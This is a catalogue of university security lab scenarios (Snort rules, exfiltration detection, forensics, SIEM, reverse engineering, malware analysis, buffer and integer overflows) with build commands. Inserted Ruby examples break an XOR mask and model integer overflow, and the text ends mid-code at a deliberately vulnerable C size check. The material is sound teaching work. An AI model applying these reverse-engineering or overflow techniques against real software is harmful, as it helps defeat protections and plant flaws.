Linked videos https://youtu.be/raR0HstMnjg; https://youtu.be/3oDVTSFhl8Y; https://youtu.be/M6MisvbU32M
VM names desktop; ids_monitor; web_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |
| Security Operations & Incident Management (SOIM) | Analyse: Analysis Methods | misuse detection; anomaly detection |
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | intrusion prevention systems |
| Network Security (NS) | Network Defence Tools | packet filters; intrusion detection systems |
| Malware & Attack Technology (MAT) | Malware Detection | attack detection |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/4_ids.xml run

View source

response_and_investigation/5_ids_rules.xml

Details

Key Data
Name IDS rules lab
Description
Introduction
In this lab on Intrusion Detection and Prevention Systems, you will delve into the world of network security, learning how to configure and monitor a network using Snort, a popular open-source intrusion detection system. This lab will guide you through the process of setting up Snort, and creating custom intrusion detection rules.

Throughout this lab, you will gain hands-on experience in configuring Snort to monitor network traffic. You will learn how to create custom Snort rules to detect specific network activities, and use Wireshark to capture and analyze network packets. The lab will also present you with a series of Hackerbot challenges, where you will apply your knowledge to detect and respond to various network attacks. For example, you will create Snort rules to detect attempts to access specific ports, monitor unencrypted email authentication, and more. By the end of this lab, you will have a solid understanding of intrusion detection and prevention systems, as well as practical experience in configuring and monitoring them to safeguard your network from potential threats.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/ZUMBsMppsLo; https://youtu.be/nuUm4NO_S1s
VM names desktop; ids_monitor; web_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |
| Security Operations & Incident Management (SOIM) | Analyse: Analysis Methods | misuse detection; anomaly detection |
| Network Security (NS) | Network Defence Tools | packet filters; intrusion detection systems; IDS rules creation |
| Malware & Attack Technology (MAT) | Malware Detection | attack detection |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/5_ids_rules.xml run

View source

response_and_investigation/6_exfiltration_detection.xml

Details

Key Data
Name Exfiltration detection lab
Description
Introduction
In this lab, you will delve into the critical realm of Data Loss Prevention (DLP) and exfiltration detection. Data loss prevention is a vital cybersecurity practice aimed at safeguarding sensitive information from unauthorized access or leakage. It is highly relevant in today's digital age, where data breaches and insider threats pose significant risks to organizations. This lab provides you with hands-on experience in setting up and configuring Snort, a popular Intrusion Detection System (IDS), to monitor network traffic and detect the unauthorized transfer of sensitive data.

In this lab, you will learn how to configure Snort to detect unauthorized data transfers and exfiltration. By editing Snort configuration files, you will set up monitoring rules that trigger alerts when sensitive data, like credit card details and national insurance numbers, are being transported over the network. You will also extend your rule to detect the transfer of a fake data file so that your rules are effective without revealing the actual sensitive content. To accomplish this, you'll explore various Snort rule techniques, such as text-based, regular expression-based, and hash-based matching, gaining an in-depth understanding of data loss prevention strategies. By the end of the lab, you'll have practical experience in setting up DLP measures using Snort, a valuable skill for protecting an organization's sensitive data assets.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/4zYn4hbwKYQ; https://youtu.be/Y32tmFrCEBk
VM names desktop; ids_monitor; web_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Artifact Analysis | cryptographic hashing |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |
| Security Operations & Incident Management (SOIM) | Analyse: Analysis Methods | Exfiltration detection / data loss prevention |
| Network Security (NS) | Network Defence Tools | packet filters; intrusion detection systems; intrusion prevention systems; IDS rules creation |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/6_exfiltration_detection.xml run

View source

response_and_investigation/7_live_analysis.xml

Details

Key Data
Name Live analysis lab
Description
Introduction
In this lab, you will dive into the world of digital forensics and incident response by investigating a potentially compromised server. Security breaches and compromises are a common occurrence in the digital age, and it's essential to understand how to analyze and gather evidence from a compromised system to determine the extent of the intrusion and identify potential threats. This lab will walk you through the process of live system analysis, using both standard Unix commands and tools provided by the FIRE (Forensic and Incident Response Environment) CD/DVD ISO, in order to collect volatile data and assess the system's security.

Throughout this hands-on lab, you will learn essential techniques for live system analysis, such as collecting information about running processes, network connections, kernel modules, and system state. You will also explore the use of static binaries to avoid potential tampering with dynamically linked executables. Additionally, you will employ tools like Chkrootkit to detect rootkits and perform offline analysis to uncover any suspicious activity or security breaches. By completing tasks such as creating a list of suspicious open ports, identifying unreported processes, and analyzing the output of data collection scripts, you will gain practical experience in investigating compromised systems, a crucial skill for cybersecurity professionals and digital forensics experts.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/aNvVtF437LI; https://www.youtube.com/watch?v=iUInvMrBw3k; https://youtu.be/9nyvtJRQ17w
VM names desktop; hackerbot_server; compromised_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Main Memory Forensics | process information; file information; network connections; artifacts and fragments; challenges of live forensics |
| Operating Systems & Virtualisation (OSV) | OS Hardening | anomaly detection |
| Authentication, Authorisation & Accountability (AAA) | Accountability | The fallibility of digital evidence to tampering |
| Malware & Attack Technology (MAT) | Malware Detection | identifying the presence of malware |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/7_live_analysis.xml run

View source

response_and_investigation/8_dead_analysis.xml

Details

Key Data
Name Dead analysis lab
Description
Introduction
In this lab, you will delve into the world of digital forensics and offline analysis by examining a compromised system to uncover evidence of a security breach. This lab provides a hands-on experience with various forensic tools and techniques to investigate a compromised server. You will explore key theoretical concepts such as integrity management, log analysis, file recovery, and timeline reconstruction to piece together the events leading to the system compromise.

You will learn how to mount a disk image read-only, analyze file integrity using MD5 hashes, use Autopsy on Kali to examine file types and check for trojanized executables, conduct timeline analysis to reconstruct the sequence of events, and examine deleted files for hidden clues. You will also investigate log files, identify attempted SSH and Telnet logins, and recover email addresses used in communication. By the end of the lab, you will have gained valuable practical experience in forensic analysis and incident response, equipping you with skills to identify and understand security breaches in real-world scenarios.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/3kiV0ZJWmMY
VM names kali; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Operating System Analysis | storage forensics; data recovery and file content carving; Timeline analysis |
| Malware & Attack Technology (MAT) | Malware Detection | identifying the presence of malware |
| Authentication, Authorisation & Accountability (AAA) | Accountability | The fallibility of digital evidence to tampering |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/8_dead_analysis.xml run

View source

response_and_investigation/9_siem.xml

Details

Key Data
Name Security information and event management (SIEM) and Elastic (ELK) Stack lab
Description
Introduction
This lab provides a comprehensive overview of logging and security information and event management (SIEM) concepts, with an emphasis on the context of Linux systems. Logging is a critical aspect of system administration and security, enabling the monitoring of system events and providing valuable insights into system activities. The lab covers the fundamentals of logging, including the systemd journal and traditional syslog, and introduces the Elastic (ELK) Stack as a powerful SIEM solution. It also explores the usage of Auditbeat to monitor system audit information and highlights the role of a Security Operations Centre (SOC) in managing and responding to security incidents.

In this lab, you will learn how to use various logging tools and commands, such as journalctl and syslog, to access and analyze system logs. You will gain practical experience in configuring logging rules, utilizing regular expressions to filter log data, and exploring log rotation for efficient log management. Additionally, you will set up Auditbeat to monitor system activities and visualize the collected data using Elastic Stack. By the end of the lab, you will have a strong foundation in log management, SIEM, and be well-equipped to enhance the security and monitoring capabilities of Linux systems.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Lab sheet https://docs.google.com/document/d/13fzmV01ju4sTFc9R-Fzr6Ti2zQ5UYSx3ClGrycs9XVA/edit?usp=sharing
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/0EafG4CLwA4
VM names siem_management; desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Fundamental Concepts | workflows and vocabulary; PURPOSE OF LOGGING AND AUDITING |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | system and kernel logs; Syslog; Linux Journal and SystemD; EVENTS - LOGGING; LOG FILES - CENTRALIZED LOGGING; LOG FILES - EVENT SOURCE CONFIGURATION; LOGGING AND AUDITING OF CHANGES; MONITORING - INTEGRITY; AuditBeat |
| Security Operations & Incident Management (SOIM) | Analyse: Analysis Methods | contribution of SIEM to analysis and detection; EVENTS - ANALYSIS |
| Security Operations & Incident Management (SOIM) | Plan: Security Information and Event Management | data collection; alert correlation; LOG FILES - INCIDENT RESPONSE; MONITORING - INCIDENT RESPONSE |
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | SIEM platforms and countermeasures; SECURITY INFORMATION AND EVENT MANAGEMENT (SIEM); Configuring Elastic Stack for centralised logging and SIEM |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/9_siem.xml run

View source

software_and_malware_analysis/10_anti_sre.xml

Details

Key Data
Name Anti-SRE
Description
Introduction
In this lab on anti-reverse-engineering techniques, you will explore the various tactics employed by both malicious actors and legitimate software developers to thwart the efforts of reverse engineers. This lab provides an in-depth understanding of how malware samples can identify their operating environment, detect the presence of debuggers, and employ anti-disassembly techniques to obfuscate their code.

Throughout this lab, you will learn how malware samples identify virtual machine and sandbox environments, detect debuggers, and modify their runtime behavior. You'll also explore anti-disassembly techniques and code obfuscation methods, gaining hands-on experience with a set of practical challenges. Tasks include analyzing code in disassemblers like Ghidra, bypassing anti-debugging techniques, and deciphering hidden passwords within obfuscated code. By the end of this lab, you will have honed your skills in dynamic analysis and developed a deep understanding of the cat-and-mouse game between malware creators and reverse engineers. Get ready to unlock the secrets of anti-reverse-engineering and enhance your cybersecurity expertise through a series of engaging challenges.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1UsC3zykLAZwoV7bg5hP2hL1zpdxusjSZ3HVBnwZb5M4/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; anti-analysis and evasion techniques |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/10_anti_sre.xml run

View source

software_and_malware_analysis/11_coconut.xml

Details

Key Data
Name Malware Behaviour: Live Sample Analysis
Description A Hackerbot lab involving the analysis of a live malware sample.
Type hackerbot-lab; ctf-lab; lab-sheet
Author Tom Shaw; Mo Hassan
VM names desktop; hb_server; victim_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Taxonomy | dimensions; kinds |
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/11_coconut.xml run

View source

software_and_malware_analysis/1_dynamic_and_static_analysis.xml

Details

Key Data
Name Introduction to Malware analysis lab
Description
Introduction
In this lab on Reverse Engineering and Malware Analysis, you will delve into the world of malicious code analysis and gain a deeper understanding of how to dissect compiled binary programs. By learning the techniques and tools for static and dynamic analysis, you will equip yourself with the skills necessary to identify and analyze malware, investigate security incidents, and develop countermeasures against these threats.

Throughout this lab, you will learn about the two fundamental approaches to malware analysis: static and dynamic analysis. In static analysis, you will explore the contents of binary executable files, deciphering machine code instructions, and extracting useful information such as strings and metadata. You will use tools like hexdump, readelf, and strings to dissect the structure of executable files and understand their behavior without executing them. In dynamic analysis, you will run malware in a controlled environment, monitoring system calls and dynamic library functions using tools like strace and ltrace. Additionally, you will participate in practical exercises by solving reverse engineering Capture The Flag (CTF) challenges that apply the concepts learned in the lab. By the end of this lab, you will have a strong foundation in malware analysis techniques, preparing you for further exploration of lower-level concepts such as C and assembly code, which are essential in the world of cybersecurity.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1CRGtnCTOogpEIjl-tLYdZqHBwJt75FpUJTE2xUL9wqI/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/14Hv_QodLxs; https://youtu.be/quKsZbpvYIY; https://youtu.be/CxZx7b3OPsg; https://youtu.be/3qmmqfBtJio; https://youtu.be/k3NwrFWuhaY
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Taxonomy | dimensions; kinds |
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/1_dynamic_and_static_analysis.xml run

View source

software_and_malware_analysis/2_intro_to_c.xml

Details

Key Data
Name Introduction to C lab
Description
Introduction
In this lab, you will dive into the world of the C programming language, exploring its fundamental concepts and practical applications. Understanding C is essential, not only for programming but also for dissecting and analyzing malware, as many malicious programs are still written in C due to its low-level control over system resources. The lab begins by differentiating between high and low-level languages, highlighting the importance of assembly language and its human-readable representation. It emphasizes that, while you'll be working with high-level languages like C, you should be aware of the low-level details, which will be crucial for future tasks in the realm of cybersecurity.

Throughout the lab, you will learn the basics of C programming by working on hands-on exercises. You'll start by creating a simple "Hello, world!" program, and then progress to explore data types, arrays, strings, conditionals, loops, functions, and pointers. For instance, you will write code to calculate averages and VAT, work with pointers to access memory addresses, and understand the relationship between arrays and pointers. By the end of this lab, you will have gained practical experience in C programming, setting a solid foundation for future endeavors in the field of cybersecurity and malware analysis.

This lab covers really important fundamentals. There are no flags this week.
Lab sheet https://docs.google.com/document/d/1qaq8LF6wbe9OvXwAqmLQ_FA-1OTRkRVxjH5O5KRDM2w/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thalita Vergilio
Linked videos https://youtu.be/chebVVwj1kM; https://youtu.be/2R4QzDAfzLQ
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Technical Underpinning | Technical underpinnings for malware analysis: C |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/2_intro_to_c.xml run

View source

software_and_malware_analysis/3_c_and_asm.xml

Details

Key Data
Name C and Assembly lab
Description
Introduction
In this lab, we delve into the world of C programming and assembly language, covering essential concepts and practical tasks to build a strong foundation in low-level programming. We begin by exploring the use of structs in C, a fundamental data type for handling composite data structures. You'll learn how to define and manipulate structs, enabling you to work with more complex data in programs.

Moving on to memory management, you'll understand the difference between the stack and heap, gaining insights into dynamic memory allocation and the crucial task of memory deallocation to prevent memory leaks. Practical examples and exercises will guide you through these concepts, including using the Valgrind tool to check for memory issues. Additionally, you'll dive into the world of bitwise operators, essential for disassembling code. You'll explore the use of operators like AND, OR, XOR, and more, and even work on a challenge where you'll need to reverse engineer a binary code. Finally, we introduce you to the fascinating realm of assembly language for 32-bit x86 processors, covering registers, flags, operands, and basic instructions. You'll practice disassembling code, identifying key elements, and gaining insights into the low-level operations of a computer system. Practical challenges and real-world scenarios will empower you with the knowledge and skills needed for low-level programming and reverse engineering.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.

Lab sheet https://docs.google.com/document/d/14bEEdrJb0hGS5sBR-mOTWzCY-ws1LFDza3sIM04Akvg/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thalita Vergilio
Linked videos https://youtu.be/QbyorEb3WTs
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments |
| Malware & Attack Technology (MAT) | Technical Underpinning | Technical underpinnings for malware analysis: C; Technical underpinnings for malware analysis: ASM |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/3_c_and_asm.xml run

View source

software_and_malware_analysis/4_asm.xml

Details

Key Data
Name Recognising C Code Constructs in Assembly lab
Description
Introduction
In this lab you will dive deep into the world of 32-bit x86 assembly language to gain a comprehensive understanding of how C code constructs are represented in assembly. This knowledge is not only essential for understanding how software functions at a low level but also for identifying and analyzing malicious code and vulnerabilities. The lab will cover crucial theoretical concepts, including branching, conditionals, loops, switch statements, arrays, strings, and structs in assembly language.

Throughout this lab, you will learn how to recognize and map C code constructs into their assembly language counterparts. You will engage in hands-on activities such as disassembling C programs using tools like objdump, and analyzing the resulting assembly code to identify key elements like loops, conditionals, and switch statements. You will also solve practical challenges within the lab, such as finding specific flags hidden within assembly code by following hints and performing dynamic analysis. By the end of this lab, you will have a solid grasp of these reverse engineering and malware analysis fundamentals, equipped with the skills to dissect and understand low-level code structures and uncover elements within them.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1l4tU49JhI65Q85Zv9I1Wm1kaHNENp6iyIwMUhM8j_14/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thalita Vergilio
Linked videos https://youtu.be/8b6JokfEFEo
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; STATIC ANALYSIS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/4_asm.xml run

View source

software_and_malware_analysis/5_ghidra.xml

Details

Key Data
Name Ghidra lab
Description
Introduction
In this lab you will dive into the fascinating world of software reverse engineering (SRE) using the powerful tool Ghidra. SRE plays a crucial role in understanding the inner workings of software without access to its source code, making it a critical skill for cybersecurity professionals, software developers, and anyone interested in understanding how programs function at a low level. You will explore key theoretical concepts such as CPU architectures, memory layout randomization, and the role of external libraries in program execution.

Throughout this lab, you will embark on a hands-on journey to reverse engineer and analyze various aspects of executable files. You will start by creating and analyzing a simple "Hello, world!" program, learning how to set up Ghidra, import and analyze files, and interpret disassembled and decompiled code. You will also investigate the differences between 32-bit and 64-bit CPU architectures and the impact of memory layout randomization. As you progress, you will tackle challenges that require you to annotate and comment on code, rename functions and variables, and add valuable insights through comments. By the end of this lab, you will have gained practical experience in software reverse engineering and developed a deeper understanding of how to unravel the mysteries hidden within executable files.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1d2l1Z5l3r-DOdt-MG96H8HdhmN2l54dz8TL-8iigxWU/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/0zUmUZoEpC4; https://youtu.be/m73pHO_0vhI
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; STATIC ANALYSIS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/5_ghidra.xml run

View source

software_and_malware_analysis/6_ghidra_analysis.xml

Details

Key Data
Name Ghidra lab analysis
Description
Introduction
Using the skills you have developed thus far, practise SRE with Ghidra on two further binaries.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; STATIC ANALYSIS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/6_ghidra_analysis.xml run

View source

software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml

Details

Key Data
Name Ghidra lab with LIVE MALWARE SAMPLES
Description You will find live malware samples in /opt/theZoo.
Type lab-sheet
Author Z. Cliffe Schreuders
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml run

View source

software_and_malware_analysis/7_dynamic.xml

Details

Key Data
Name Dynamic analysis SRE
Description
Introduction
Dynamic analysis and debugging play a pivotal role in the field of cybersecurity and malware analysis. In this lab, you will delve into the world of dynamic malware analysis, a critical practice for understanding how malicious software behaves at runtime. You will learn how to use the GNU Debugger (GDB) to dissect and monitor a program's execution, even when you don't have access to its source code. This is particularly valuable for cybersecurity professionals and malware analysts, as it enables them to identify and analyze malicious behavior, ultimately contributing to the development of effective security measures.

Throughout this lab, you will gain a comprehensive understanding of GDB, from setting breakpoints and examining memory locations to analyzing registers and making informed decisions about program execution. You will explore practical examples, such as setting breakpoints at specific locations in the code, examining memory content, and identifying crucial information like passwords. By the end of this lab, you will have the skills necessary to conduct dynamic analysis and debug potentially malicious programs effectively, providing invaluable insights into their runtime behavior and enhancing your expertise in the realm of cybersecurity and malware analysis.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1EuTmklR3AVxdiYTrzyJ89vHU9UUY2QOn3oU74zQF19k/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/6MeJIr3EKKM
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; DYNAMIC ANALYSIS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/7_dynamic.xml run

View source

software_and_malware_analysis/8_dynamic_continued.xml

Details

Key Data
Name Dynamic analysis SRE (cont.)
Description
Introduction
Building upon the skills acquired in the previous lab, this hands-on debugging session takes your expertise to the next level with a fresh set of challenges. These new exercises further enhance your dynamic analysis capabilities using the GNU Debugger (GDB). In the world of reverse engineering and cybersecurity, debugging is an indispensable skill, particularly when the source code remains elusive. This lab provides the ideal platform to fortify your skills by introducing unique challenges, each designed to push the boundaries of your GDB proficiency.

You'll set breakpoints, scrutinize register values, and decipher assembly instructions to uncover concealed passwords and flags. For example, in the "XorStr" challenge, you'll leverage GDB to identify an XOR mask and use it to decrypt a string, while "StaticInt" will have you focusing on EAX values and local variables to print the flag. By the conclusion of this lab, you will have cemented your debugging abilities and effectively surmounted eight new challenges, solidifying your expertise in dynamic analysis for situations where source code accessibility is restricted.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/11A7tZppId1pxbcclZDPr6e-zwWPKqPnJMgyAtcARR2s/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/pExTbDVt0Gw
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments; DYNAMIC ANALYSIS |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/8_dynamic_continued.xml run

View source
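
The "XorStr" challenge above has you read an XOR mask out of a register in GDB and apply it to the masked string. The following is an added example, not part of the lab or its materials: it shows the decryption step, how a mask can be recovered from a known plaintext prefix, and what to do when no plaintext is known. The sample ciphertext, the mask 0x5a and the plaintext are constructed for this example.

```ruby
# Added example (not from the lab): recovering and applying a single-byte XOR mask
# of the kind the "XorStr" challenge has you read out of a register in GDB.

PRINTABLE = (0x20..0x7e).freeze

# Decrypt with a known mask. The key repeats, so a one-byte mask is just the
# special case of a multi-byte key.
def xor_decrypt(cipher_bytes, key_bytes)
  cipher_bytes.each_with_index.map { |b, i| b ^ key_bytes[i % key_bytes.length] }
end

# Recover a single-byte mask when a plaintext prefix is known (flags usually start
# with a fixed marker). Returns nil if the prefix bytes disagree on the mask,
# which means the key is not a single repeated byte.
def mask_from_known_prefix(cipher_bytes, known_prefix)
  masks = cipher_bytes.first(known_prefix.bytesize).zip(known_prefix.bytes).map { |c, p| c ^ p }.uniq
  masks.length == 1 ? masks.first : nil
end

# No known plaintext: try all 256 masks and keep those whose output is entirely
# printable. Usually only a handful survive; inspect them by eye.
def printable_masks(cipher_bytes)
  (0..255).select { |k| xor_decrypt(cipher_bytes, [k]).all? { |b| PRINTABLE.cover?(b) } }
end

# Constructed sample: the bytes an `x/19xb $esi` dump might show once the masked
# string is in memory. The plaintext and the mask are invented for this example.
SAMPLE_MASK = 0x5a
SAMPLE_CIPHER = "flag{xor_mask_0x5a}".bytes.map { |b| b ^ SAMPLE_MASK }.freeze

if $PROGRAM_NAME == __FILE__
  mask = mask_from_known_prefix(SAMPLE_CIPHER, "flag{")
  puts "mask 0x#{mask.to_s(16)} -> #{xor_decrypt(SAMPLE_CIPHER, [mask]).pack('C*')}"
end
```

In the debugger the same arithmetic is what the program does in its loop; breaking after the XOR instruction and dumping the destination buffer gives you the decrypted string without running this at all, but knowing the mask lets you decrypt other strings the binary protects the same way.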

software_and_malware_analysis/9_malware_behaviour.xml

Details

Key Data
Name Malware Behaviour
Description
Introduction
A MetaCTF lab. In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the file.

There are also binaries on which to perform dynamic SRE.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/6XMrHyAqD-4; https://youtu.be/KJPeZptzl1U; https://youtu.be/6qeDnjOaRiI
VM names metactf

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Malware & Attack Technology (MAT) | Malware Taxonomy | dimensions; kinds |
| Malware & Attack Technology (MAT) | Malware Analysis | analysis techniques; analysis environments |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/9_malware_behaviour.xml run

View source

software_security_exploitation/1_c_asm_iof.xml

Details

Key Data
Name Understanding Software Vulnerabilities: C, Debugging Assembly, and Buffer Overflows
Description
Introduction
This lab provides an introduction to the fundamental concepts of software vulnerabilities, programming in C, and debugging assembly code. It emphasizes the importance of secure coding and understanding the potential security flaws that can arise due to programming errors. In this lab, you will learn how small programming mistakes can result in software vulnerabilities with serious consequences. You will explore two main categories of software flaws: design problems and implementation problems. Common programming errors leading to security flaws, such as memory errors, input handling, and misuse of pointers and strings, will be discussed.

You will dive into programming in C, debugging assembly code using GDB, and understanding the stack structure in memory. You will create and compile simple C programs, explore the basics of assembly code, and learn to use GDB for debugging. The lab includes practical tasks, such as writing and running C programs, analyzing assembly code, and identifying security vulnerabilities in the code. You'll experiment with different inputs to understand how software vulnerabilities can be exploited and how to fix them, using secure coding practices. By the end of the lab, you will have a better grasp of software vulnerabilities and the tools and techniques for identifying and addressing them in C programs.

Overall, this lab serves as a foundational module for understanding software security, highlighting the critical role of secure coding practices and the potential consequences of software vulnerabilities.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1AxTve1RBzqvdPxt8Wziga2x2e3lZp4k5YsMq3KxkXzM/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/jo_07iOplzA; https://youtu.be/1Hy_166CwRk
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
| --- | --- | --- |
| Software Security (SS) | Categories of Vulnerabilities | Integer overflow |
| Software Security (SS) | Prevention of Vulnerabilities | language design and type systems |

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/1_c_asm_iof.xml run

View source
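
The lab's keyword is integer overflow, and the C programs you debug there wrap at 32 bits. The following added example (not from the lab) models that wraparound in Ruby, whose integers do not overflow, so the failing check and the corrected check can be compared side by side. The buffer size, element size and the C fragments in the comments are assumptions chosen for illustration.

```ruby
# Added example (not from the lab): the 32-bit integer overflow that defeats a
# naive allocation-size check in C, modelled in Ruby, next to the check that holds.

UINT32_MAX = 0xFFFF_FFFF
BUF_SIZE = 1024
ELEM_SIZE = 4          # sizeof(int) on the lab's 32-bit targets (assumed)

# Emulate C unsigned 32-bit arithmetic: the result wraps modulo 2^32.
def u32(x)
  x & UINT32_MAX
end

# Emulate C reading the same 32 bits as a signed int.
def to_int32(x)
  v = u32(x)
  v >= 0x8000_0000 ? v - (UINT32_MAX + 1) : v
end

# Vulnerable check as it would be written in C:
#   if (count * sizeof(int) <= BUF_SIZE) { for (i = 0; i < count; i++) buf[i] = src[i]; }
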